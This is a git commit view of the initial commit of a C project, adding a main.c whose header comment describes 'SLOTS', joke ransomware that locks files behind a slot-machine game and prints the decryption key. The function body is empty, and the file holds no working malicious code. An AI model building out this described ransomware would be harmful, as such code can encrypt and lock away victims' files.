diff options
| author | @syxhe <https://t.me/syxhe> | 2024-06-10 23:19:04 -0500 |
|---|---|---|
| committer | @syxhe <https://t.me/syxhe> | 2024-06-10 23:19:04 -0500 |
| commit | 1e9915d2ce9baa31506a8c04929d6e44a29f106b (patch) | |
| tree | ce659689a424f63481151cf726fb4f34491c9bc0 /src/main.c | |
Initial Commit
Diffstat (limited to 'src/main.c')
| -rw-r--r-- | src/main.c | 15 |
1 files changed, 15 insertions, 0 deletions
diff --git a/src/main.c b/src/main.c new file mode 100644 index 0000000..6e0bc8f --- /dev/null +++ b/src/main.c | |||
| @@ -0,0 +1,15 @@ | |||
| 1 | /*** | ||
| 2 | * SLOTS - Feelin' Lucky? | ||
| 3 | * | ||
| 4 | * SLOTS is ransomware that uses (shitty) encryption to "encourage" the reluctant gambler. You get 3 free spins to get a jackpot, further spins "cost" money. | ||
| 5 | * This malware is meant primarily as a joke, not as something meant to damage someone's system. While it CAN damage someone's computer and lock their files away, it | ||
| 6 | * also prints out the key required to decrypt affected files if someone isn't too keen on losing their shit | ||
| 7 | * | ||
| 8 | * | ||
| 9 | */ | ||
| 10 | |||
| 11 | int main() { | ||
| 12 | |||
| 13 | |||
| 14 | return 0; | ||
| 15 | } \ No newline at end of file | ||
